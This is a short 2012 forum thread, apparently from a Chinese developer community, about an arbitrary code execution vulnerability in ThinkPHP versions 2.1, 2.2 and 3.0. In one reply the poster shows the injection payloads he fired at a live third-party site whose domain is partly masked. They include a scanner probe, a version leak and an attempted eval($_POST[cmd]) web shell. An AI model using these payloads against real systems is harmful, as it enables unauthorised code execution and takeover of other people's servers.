ihacku

ThinkPHP framework 任意代码执行漏洞预警

  •  
  •   ihacku · Apr 9, 2012 · 5490 views
    This topic created in 5159 days ago, the information mentioned may be changed or developed.
    3 replies    1970-01-01 08:00:00 +08:00
    mywaiting
        1
    mywaiting  
       Apr 9, 2012
    乌云多了个水区后,我显然多了个可以去的好地方
    ihacku
        2
    ihacku  
    OP
       Apr 9, 2012
    本来我是刚买完票 随手用AWS测试个站 报PHP code injection
    http://taot**.net/events/content/id/${@print(md5(acunetix_wvs_security_test))}
    后来才看到乌云上的帖子的
    http://taot**.net/events/content/id/${@print(THINK_VERSION)}
    版本2.1 漏洞影响到的版本包括2.1、2.2和3.0
    不知道具体怎么利用 试着在后面加了一句话
    http://taot**.net/events/content/id/${@eval($_POST[cmd])}
    都是一闪就过去了
    ihacku
        3
    ihacku  
    OP
       Apr 9, 2012
    唔 代码被转掉了
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   5811 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 166ms · UTC 02:18 · PVG 10:18 · LAX 19:18 · JFK 22:18
    ♥ Do have faith in what you're doing.